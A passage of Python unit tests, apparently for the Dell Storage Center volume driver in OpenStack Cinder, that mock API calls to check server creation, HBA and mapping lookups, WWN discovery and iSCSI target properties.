mock_find_server_folder,
mock_first_result,
mock_add_hba,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi.create_server(self.IQN)
self.assertTrue(mock_find_serveros.called)
self.assertTrue(mock_find_server_folder.called)
self.assertTrue(mock_first_result.called)
self.assertTrue(mock_add_hba.called)
self.assertEqual(self.SCSERVER, res, 'Unexpected ScServer')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_add_hba',
return_value=True)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_first_result',
return_value=SCSERVER)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_server_folder',
return_value=SVR_FLDR)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_serveros',
return_value=None)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_201)
def test_create_server_os_not_found(self,
mock_post,
mock_find_serveros,
mock_find_server_folder,
mock_first_result,
mock_add_hba,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi.create_server(self.IQN)
self.assertTrue(mock_find_serveros.called)
self.assertEqual(self.SCSERVER, res, 'Unexpected ScServer')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_add_hba',
return_value=True)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_first_result',
return_value=SCSERVER)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_server_folder',
return_value=None)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_serveros',
return_value='64702.38')
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_201)
def test_create_server_fldr_not_found(self,
mock_post,
mock_find_serveros,
mock_find_server_folder,
mock_first_result,
mock_add_hba,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi.create_server(self.IQN)
self.assertTrue(mock_find_server_folder.called)
self.assertEqual(self.SCSERVER, res, 'Unexpected ScServer')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_add_hba',
return_value=True)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_first_result',
return_value=SCSERVER)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_server_folder',
return_value=None)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_serveros',
return_value='64702.38')
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_400)
def test_create_server_failure(self,
mock_post,
mock_find_serveros,
mock_find_server_folder,
mock_first_result,
mock_add_hba,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi.create_server(self.IQN)
self.assertIsNone(res, 'None expected')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_add_hba',
return_value=True)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_first_result',
return_value=None)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_server_folder',
return_value=None)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_serveros',
return_value='64702.38')
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_201)
def test_create_server_not_found(self,
mock_post,
mock_find_serveros,
mock_find_server_folder,
mock_first_result,
mock_add_hba,
mock_close_connection,
mock_open_connection,
mock_init):
# Test create server where _first_result is None
res = self.scapi.create_server(self.IQN)
self.assertIsNone(res, 'None expected')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_delete_server',
return_value=None)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_add_hba',
return_value=False)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_first_result',
return_value=SCSERVER)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_server_folder',
return_value=SVR_FLDR)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_serveros',
return_value='64702.38')
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_201)
def test_create_server_addhba_fail(self,
mock_post,
mock_find_serveros,
mock_find_server_folder,
mock_first_result,
mock_add_hba,
mock_delete_server,
mock_close_connection,
mock_open_connection,
mock_init):
# Tests create server where add hba fails
res = self.scapi.create_server(self.IQN)
self.assertTrue(mock_delete_server.called)
self.assertIsNone(res, 'None expected')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_first_result',
return_value=SCSERVER)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_serverhba',
return_value=ISCSI_HBA)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_200)
def test_find_server(self,
mock_post,
mock_find_serverhba,
mock_first_result,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi.find_server(self.IQN)
self.assertTrue(mock_find_serverhba.called)
self.assertTrue(mock_first_result.called)
self.assertIsNotNone(res, 'Expected ScServer')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_serverhba',
return_value=None)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_200)
def test_find_server_no_hba(self,
mock_post,
mock_find_serverhba,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case where a ScServer HBA does not exist with the specified IQN
# or WWN
res = self.scapi.find_server(self.IQN)
self.assertTrue(mock_find_serverhba.called)
self.assertIsNone(res, 'Expected None')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_serverhba',
return_value=ISCSI_HBA)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_204)
def test_find_server_failure(self,
mock_post,
mock_find_serverhba,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case where a ScServer does not exist with the specified
# ScServerHba
res = self.scapi.find_server(self.IQN)
self.assertTrue(mock_find_serverhba.called)
self.assertIsNone(res, 'Expected None')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_first_result',
return_value=ISCSI_HBA)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_200)
def test_find_serverhba(self,
mock_post,
mock_first_result,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi.find_server(self.IQN)
self.assertTrue(mock_post.called)
self.assertTrue(mock_first_result.called)
self.assertIsNotNone(res, 'Expected ScServerHba')
@mock.patch.object(dell_storagecenter_api.HttpClient,
'post',
return_value=RESPONSE_204)
def test_find_serverhba_failure(self,
mock_post,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case where a ScServer does not exist with the specified
# ScServerHba
res = self.scapi.find_server(self.IQN)
self.assertIsNone(res, 'Expected None')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json',
return_value=ISCSI_FLT_DOMAINS)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'get',
return_value=RESPONSE_200)
def test_find_domains(self,
mock_get,
mock_get_json,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi._find_domains(u'64702.5764839588723736074.69')
self.assertTrue(mock_get.called)
self.assertTrue(mock_get_json.called)
self.assertEqual(
self.ISCSI_FLT_DOMAINS, res, 'Unexpected ScIscsiFaultDomain')
@mock.patch.object(dell_storagecenter_api.HttpClient,
'get',
return_value=RESPONSE_204)
def test_find_domains_error(self,
mock_get,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case where get of ScControllerPort FaultDomainList fails
res = self.scapi._find_domains(u'64702.5764839588723736074.69')
self.assertIsNone(res, 'Expected None')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json',
return_value=FC_HBAS)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'get',
return_value=RESPONSE_200)
def test_find_initiators(self,
mock_get,
mock_get_json,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi._find_initiators(self.SCSERVER)
self.assertTrue(mock_get.called)
self.assertTrue(mock_get_json.called)
self.assertIsNotNone(res, 'Expected WWN list')
@mock.patch.object(dell_storagecenter_api.HttpClient,
'get',
return_value=RESPONSE_400)
def test_find_initiators_error(self,
mock_get,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case where get of ScServer HbaList fails
res = self.scapi._find_initiators(self.SCSERVER)
self.assertListEqual([], res, 'Expected empty list')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json',
return_value=MAPPINGS)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'get',
return_value=RESPONSE_200)
def test_get_volume_count(self,
mock_get,
mock_get_json,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi.get_volume_count(self.SCSERVER)
self.assertTrue(mock_get.called)
self.assertTrue(mock_get_json.called)
self.assertEqual(len(self.MAPPINGS), res, 'Mapping count mismatch')
@mock.patch.object(dell_storagecenter_api.HttpClient,
'get',
return_value=RESPONSE_400)
def test_get_volume_count_failure(self,
mock_get,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case of where get of ScServer MappingList fails
res = self.scapi.get_volume_count(self.SCSERVER)
self.assertTrue(mock_get.called)
self.assertEqual(-1, res, 'Mapping count not -1')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json',
return_value=[])
@mock.patch.object(dell_storagecenter_api.HttpClient,
'get',
return_value=RESPONSE_200)
def test_get_volume_count_no_volumes(self,
mock_get,
mock_get_json,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi.get_volume_count(self.SCSERVER)
self.assertTrue(mock_get.called)
self.assertTrue(mock_get_json.called)
self.assertEqual(len([]), res, 'Mapping count mismatch')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json',
return_value=MAPPINGS)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'get',
return_value=RESPONSE_200)
def test_find_mappings(self,
mock_get,
mock_get_json,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi._find_mappings(self.VOLUME)
self.assertTrue(mock_get.called)
self.assertTrue(mock_get_json.called)
self.assertEqual(self.MAPPINGS, res, 'Mapping mismatch')
@mock.patch.object(dell_storagecenter_api.HttpClient,
'get',
return_value=RESPONSE_200)
def test_find_mappings_inactive_vol(self,
mock_get,
mock_close_connection,
mock_open_connection,
mock_init):
# Test getting volume mappings on inactive volume
res = self.scapi._find_mappings(self.INACTIVE_VOLUME)
self.assertFalse(mock_get.called)
self.assertEqual([], res, 'No mappings expected')
@mock.patch.object(dell_storagecenter_api.HttpClient,
'get',
return_value=RESPONSE_400)
def test_find_mappings_failure(self,
mock_get,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case of where get of ScVolume MappingList fails
res = self.scapi._find_mappings(self.VOLUME)
self.assertTrue(mock_get.called)
self.assertEqual([], res, 'Mapping count not empty')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json',
return_value=[])
@mock.patch.object(dell_storagecenter_api.HttpClient,
'get',
return_value=RESPONSE_200)
def test_find_mappings_no_mappings(self,
mock_get,
mock_get_json,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case where ScVolume has no mappings
res = self.scapi._find_mappings(self.VOLUME)
self.assertTrue(mock_get.called)
self.assertTrue(mock_get_json.called)
self.assertEqual([], res, 'Mapping count mismatch')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_get_json',
return_value=MAP_PROFILES)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'get',
return_value=RESPONSE_200)
def test_find_mapping_profiles(self,
mock_get,
mock_get_json,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case where ScVolume has no mappings
res = self.scapi._find_mapping_profiles(self.VOLUME)
self.assertTrue(mock_get.called)
self.assertTrue(mock_get_json.called)
self.assertEqual(self.MAP_PROFILES, res)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'get',
return_value=RESPONSE_400)
def test_find_mapping_profiles_error(self,
mock_get,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case where ScVolume has no mappings
res = self.scapi._find_mapping_profiles(self.VOLUME)
self.assertTrue(mock_get.called)
self.assertEqual([], res)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_first_result',
return_value=CTRLR_PORT)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'get',
return_value=RESPONSE_200)
def test_find_controller_port(self,
mock_get,
mock_first_result,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi._find_controller_port(u'64702.5764839588723736070.51')
self.assertTrue(mock_get.called)
self.assertTrue(mock_first_result.called)
self.assertEqual(self.CTRLR_PORT, res, 'ScControllerPort mismatch')
@mock.patch.object(dell_storagecenter_api.HttpClient,
'get',
return_value=RESPONSE_204)
def test_find_controller_port_failure(self,
mock_get,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case where get of ScVolume MappingList fails
res = self.scapi._find_controller_port(self.VOLUME)
self.assertTrue(mock_get.called)
self.assertIsNone(res, 'None expected')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_controller_port',
return_value=FC_CTRLR_PORT)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_mappings',
return_value=FC_MAPPINGS)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_initiators',
return_value=WWNS)
def test_find_wwns(self,
mock_find_initiators,
mock_find_mappings,
mock_find_controller_port,
mock_close_connection,
mock_open_connection,
mock_init):
lun, wwns, itmap = self.scapi.find_wwns(self.VOLUME,
self.SCSERVER)
self.assertTrue(mock_find_initiators.called)
self.assertTrue(mock_find_mappings.called)
self.assertTrue(mock_find_controller_port.called)
# The _find_controller_port is Mocked, so all mapping pairs
# will have the same WWN for the ScControllerPort
itmapCompare = {u'21000024FF30441C': [u'5000D31000FCBE36'],
u'21000024FF30441D':
[u'5000D31000FCBE36', u'5000D31000FCBE36']}
self.assertEqual(1, lun, 'Incorrect LUN')
self.assertIsNotNone(wwns, 'WWNs is None')
self.assertEqual(itmapCompare, itmap, 'WWN mapping incorrect')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_mappings',
return_value=[])
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_initiators',
return_value=FC_HBAS)
def test_find_wwns_no_mappings(self,
mock_find_initiators,
mock_find_mappings,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case where there are no ScMapping(s)
lun, wwns, itmap = self.scapi.find_wwns(self.VOLUME,
self.SCSERVER)
self.assertTrue(mock_find_initiators.called)
self.assertTrue(mock_find_mappings.called)
self.assertIsNone(lun, 'Incorrect LUN')
self.assertEqual([], wwns, 'WWNs is not empty')
self.assertEqual({}, itmap, 'WWN mapping not empty')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_controller_port',
return_value=None)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_mappings',
return_value=FC_MAPPINGS)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_initiators',
return_value=WWNS)
def test_find_wwns_no_ctlr_port(self,
mock_find_initiators,
mock_find_mappings,
mock_find_controller_port,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case where ScControllerPort is none
lun, wwns, itmap = self.scapi.find_wwns(self.VOLUME,
self.SCSERVER)
self.assertTrue(mock_find_initiators.called)
self.assertTrue(mock_find_mappings.called)
self.assertTrue(mock_find_controller_port.called)
self.assertIsNone(lun, 'Incorrect LUN')
self.assertEqual([], wwns, 'WWNs is not empty')
self.assertEqual({}, itmap, 'WWN mapping not empty')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_controller_port',
return_value=FC_CTRLR_PORT_WWN_ERROR)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_mappings',
return_value=FC_MAPPINGS)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_initiators',
return_value=WWNS)
def test_find_wwns_wwn_error(self,
mock_find_initiators,
mock_find_mappings,
mock_find_controller_port,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case where ScControllerPort object has WWn instead of wwn for a
# property
lun, wwns, itmap = self.scapi.find_wwns(self.VOLUME,
self.SCSERVER)
self.assertTrue(mock_find_initiators.called)
self.assertTrue(mock_find_mappings.called)
self.assertTrue(mock_find_controller_port.called)
self.assertIsNone(lun, 'Incorrect LUN')
self.assertEqual([], wwns, 'WWNs is not empty')
self.assertEqual({}, itmap, 'WWN mapping not empty')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_controller_port',
return_value=FC_CTRLR_PORT)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_mappings',
return_value=FC_MAPPINGS)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_initiators',
return_value=WWNS_NO_MATCH)
# Test case where HBA name is not found in list of initiators
def test_find_wwns_hbaname_not_found(self,
mock_find_initiators,
mock_find_mappings,
mock_find_controller_port,
mock_close_connection,
mock_open_connection,
mock_init):
lun, wwns, itmap = self.scapi.find_wwns(self.VOLUME,
self.SCSERVER)
self.assertTrue(mock_find_initiators.called)
self.assertTrue(mock_find_mappings.called)
self.assertTrue(mock_find_controller_port.called)
self.assertIsNone(lun, 'Incorrect LUN')
self.assertEqual([], wwns, 'WWNs is not empty')
self.assertEqual({}, itmap, 'WWN mapping not empty')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_controller_port',
return_value=FC_CTRLR_PORT)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_mappings',
return_value=FC_MAPPINGS_LUN_MISMATCH)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_initiators',
return_value=WWNS)
# Test case where FC mappings contain a LUN mismatch
def test_find_wwns_lun_mismatch(self,
mock_find_initiators,
mock_find_mappings,
mock_find_controller_port,
mock_close_connection,
mock_open_connection,
mock_init):
lun, wwns, itmap = self.scapi.find_wwns(self.VOLUME,
self.SCSERVER)
self.assertTrue(mock_find_initiators.called)
self.assertTrue(mock_find_mappings.called)
self.assertTrue(mock_find_controller_port.called)
# The _find_controller_port is Mocked, so all mapping pairs
# will have the same WWN for the ScControllerPort
itmapCompare = {u'21000024FF30441C': [u'5000D31000FCBE36'],
u'21000024FF30441D':
[u'5000D31000FCBE36', u'5000D31000FCBE36']}
self.assertEqual(1, lun, 'Incorrect LUN')
self.assertIsNotNone(wwns, 'WWNs is None')
self.assertEqual(itmapCompare, itmap, 'WWN mapping incorrect')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_first_result',
return_value=VOLUME_CONFIG)
@mock.patch.object(dell_storagecenter_api.HttpClient,
'get',
return_value=RESPONSE_200)
def test_find_active_controller(self,
mock_get,
mock_first_result,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi._find_active_controller(self.VOLUME)
self.assertTrue(mock_get.called)
self.assertTrue(mock_first_result.called)
self.assertEqual('64702.64703', res, 'Unexpected Active Controller')
@mock.patch.object(dell_storagecenter_api.HttpClient,
'get',
return_value=RESPONSE_400)
def test_find_active_controller_failure(self,
mock_get,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case of where get of ScVolume MappingList fails
res = self.scapi._find_active_controller(self.VOLUME)
self.assertTrue(mock_get.called)
self.assertIsNone(res, 'Expected None')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_active_controller',
return_value='64702.5764839588723736131.91')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_controller_port',
return_value=ISCSI_CTRLR_PORT)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_domains',
return_value=ISCSI_FLT_DOMAINS)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_mappings',
return_value=MAPPINGS)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_is_virtualport_mode',
return_value=True)
def test_find_iscsi_properties_mappings(self,
mock_is_virtualport_mode,
mock_find_mappings,
mock_find_domains,
mock_find_ctrl_port,
mock_find_active_controller,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi.find_iscsi_properties(self.VOLUME)
self.assertTrue(mock_is_virtualport_mode.called)
self.assertTrue(mock_find_mappings.called)
self.assertTrue(mock_find_domains.called)
self.assertTrue(mock_find_ctrl_port.called)
self.assertTrue(mock_find_active_controller.called)
expected = {'target_discovered': False,
'target_iqn':
u'iqn.2002-03.com.compellent:5000d31000fcbe43',
'target_iqns':
[u'iqn.2002-03.com.compellent:5000d31000fcbe43'],
'target_lun': 1,
'target_luns': [1],
'target_portal': u'192.168.0.21:3260',
'target_portals': [u'192.168.0.21:3260']}
self.assertEqual(expected, res, 'Wrong Target Info')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_active_controller',
return_value='64702.64702')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_controller_port',
return_value=ISCSI_CTRLR_PORT)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_domains',
return_value=ISCSI_FLT_DOMAINS)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_mappings',
return_value=MAPPINGS)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_is_virtualport_mode',
return_value=True)
def test_find_iscsi_properties_by_address(self,
mock_is_virtualport_mode,
mock_find_mappings,
mock_find_domains,
mock_find_ctrl_port,
mock_find_active_controller,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case to find iSCSI mappings by IP Address & port
res = self.scapi.find_iscsi_properties(
self.VOLUME, '192.168.0.21', 3260)
self.assertTrue(mock_is_virtualport_mode.called)
self.assertTrue(mock_find_mappings.called)
self.assertTrue(mock_find_domains.called)
self.assertTrue(mock_find_ctrl_port.called)
self.assertTrue(mock_find_active_controller.called)
expected = {'target_discovered': False,
'target_iqn':
u'iqn.2002-03.com.compellent:5000d31000fcbe43',
'target_iqns':
[u'iqn.2002-03.com.compellent:5000d31000fcbe43'],
'target_lun': 1,
'target_luns': [1],
'target_portal': u'192.168.0.21:3260',
'target_portals': [u'192.168.0.21:3260']}
self.assertEqual(expected, res, 'Wrong Target Info')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_active_controller',
return_value='64702.64702')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_controller_port',
return_value=ISCSI_CTRLR_PORT)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_domains',
return_value=ISCSI_FLT_DOMAINS)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_mappings',
return_value=MAPPINGS)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_is_virtualport_mode',
return_value=True)
def test_find_iscsi_properties_by_address_not_found(
self,
mock_is_virtualport_mode,
mock_find_mappings,
mock_find_domains,
mock_find_ctrl_port,
mock_find_active_ctrl,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case to find iSCSI mappings by IP Address & port are not found
res = self.scapi.find_iscsi_properties(
self.VOLUME, '192.168.1.21', 3260)
self.assertTrue(mock_is_virtualport_mode.called)
self.assertTrue(mock_find_mappings.called)
self.assertTrue(mock_find_domains.called)
self.assertTrue(mock_find_ctrl_port.called)
self.assertTrue(mock_find_active_ctrl.called)
expected = {'target_discovered': False,
'target_iqn':
u'iqn.2002-03.com.compellent:5000d31000fcbe43',
'target_iqns':
[u'iqn.2002-03.com.compellent:5000d31000fcbe43'],
'target_lun': 1,
'target_luns': [1],
'target_portal': u'192.168.0.21:3260',
'target_portals': [u'192.168.0.21:3260']}
self.assertEqual(expected, res, 'Wrong Target Info')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_mappings',
return_value=[])
def test_find_iscsi_properties_no_mapping(self,
mock_find_mappings,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case where there are no ScMapping(s)
self.assertRaises(exception.VolumeBackendAPIException,
self.scapi.find_iscsi_properties,
self.VOLUME)
self.assertTrue(mock_find_mappings.called)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_active_controller',
return_value='64702.64702')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_controller_port',
return_value=ISCSI_CTRLR_PORT)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_domains',
return_value=None)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_mappings',
return_value=MAPPINGS)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_is_virtualport_mode',
return_value=True)
def test_find_iscsi_properties_no_domain(self,
mock_is_virtualport_mode,
mock_find_mappings,
mock_find_domains,
mock_find_ctrl_port,
mock_find_active_controller,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case where there are no ScFaultDomain(s)
self.assertRaises(exception.VolumeBackendAPIException,
self.scapi.find_iscsi_properties,
self.VOLUME)
self.assertTrue(mock_is_virtualport_mode.called)
self.assertTrue(mock_find_mappings.called)
self.assertTrue(mock_find_domains.called)
self.assertTrue(mock_find_ctrl_port.called)
self.assertTrue(mock_find_active_controller.called)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_active_controller',
return_value='64702.64702')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_controller_port',
return_value=None)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_mappings',
return_value=MAPPINGS)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_is_virtualport_mode',
return_value=True)
def test_find_iscsi_properties_no_ctrl_port(self,
mock_is_virtualport_mode,
mock_find_mappings,
mock_find_ctrl_port,
mock_find_active_controller,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case where there are no ScFaultDomain(s)
self.assertRaises(exception.VolumeBackendAPIException,
self.scapi.find_iscsi_properties,
self.VOLUME)
self.assertTrue(mock_is_virtualport_mode.called)
self.assertTrue(mock_find_mappings.called)
self.assertTrue(mock_find_ctrl_port.called)
self.assertTrue(mock_find_active_controller.called)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_active_controller',
return_value='64702.64702')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_controller_port',
return_value=ISCSI_CTRLR_PORT)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_domains',
return_value=ISCSI_FLT_DOMAINS)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_mappings',
return_value=MAPPINGS_READ_ONLY)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_is_virtualport_mode',
return_value=True)
def test_find_iscsi_properties_ro(self,
mock_is_virtualport_mode,
mock_find_mappings,
mock_find_domains,
mock_find_ctrl_port,
mock_find_active_controller,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case where Read Only mappings are found
res = self.scapi.find_iscsi_properties(self.VOLUME)
self.assertTrue(mock_is_virtualport_mode.called)
self.assertTrue(mock_find_mappings.called)
self.assertTrue(mock_find_domains.called)
self.assertTrue(mock_find_ctrl_port.called)
self.assertTrue(mock_find_active_controller.called)
expected = {'target_discovered': False,
'target_iqn':
u'iqn.2002-03.com.compellent:5000d31000fcbe43',
'target_iqns':
[u'iqn.2002-03.com.compellent:5000d31000fcbe43'],
'target_lun': 1,
'target_luns': [1],
'target_portal': u'192.168.0.21:3260',
'target_portals': [u'192.168.0.21:3260']}
self.assertEqual(expected, res, 'Wrong Target Info')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_active_controller',
return_value='64702.64702')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_controller_port',
return_value=ISCSI_CTRLR_PORT)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_domains',
return_value=ISCSI_FLT_DOMAINS_MULTI_PORTALS)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_mappings',
return_value=MAPPINGS_MULTI_PORTAL)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_is_virtualport_mode',
return_value=True)
def test_find_iscsi_properties_multi_portals(self,
mock_is_virtualport_mode,
mock_find_mappings,
mock_find_domains,
mock_find_ctrl_port,
mock_find_active_controller,
mock_close_connection,
mock_open_connection,
mock_init):
# Test case where there are multiple portals
res = self.scapi.find_iscsi_properties(self.VOLUME)
self.assertTrue(mock_find_mappings.called)
self.assertTrue(mock_find_domains.called)
self.assertTrue(mock_find_ctrl_port.called)
self.assertTrue(mock_find_active_controller.called)
self.assertTrue(mock_is_virtualport_mode.called)
expected = {'target_discovered': False,
'target_iqn':
u'iqn.2002-03.com.compellent:5000d31000fcbe43',
'target_iqns':
[u'iqn.2002-03.com.compellent:5000d31000fcbe43',
u'iqn.2002-03.com.compellent:5000d31000fcbe43',
u'iqn.2002-03.com.compellent:5000d31000fcbe43',
u'iqn.2002-03.com.compellent:5000d31000fcbe43'],
'target_lun': 1,
'target_luns': [1, 1, 1, 1],
'target_portal': u'192.168.0.25:3260',
'target_portals': [u'192.168.0.21:3260',
u'192.168.0.25:3260',
u'192.168.0.21:3260',
u'192.168.0.25:3260']}
self.assertEqual(expected, res, 'Wrong Target Info')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_active_controller',
return_value='64702.5764839588723736131.91')
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_controller_port',
return_value=ISCSI_CTRLR_PORT)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_mappings',
return_value=MAPPINGS)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_is_virtualport_mode',
return_value=False)
@mock.patch.object(dell_storagecenter_api.StorageCenterApi,
'_find_controller_port_iscsi_config',
return_value=ISCSI_CONFIG)
def test_find_iscsi_properties_mappings_legacy(
self,
mock_find_controller_port_iscsi_config,
mock_is_virtualport_mode,
mock_find_mappings,
mock_find_ctrl_port,
mock_find_active_controller,
mock_close_connection,
mock_open_connection,
mock_init):
res = self.scapi.find_iscsi_properties(self.VOLUME)
self.assertTrue(mock_is_virtualport_mode.called)
self.assertTrue(mock_find_mappings.called)
self.assertTrue(mock_find_ctrl_port.called)
self.assertTrue(mock_find_controller_port_iscsi_config.called)
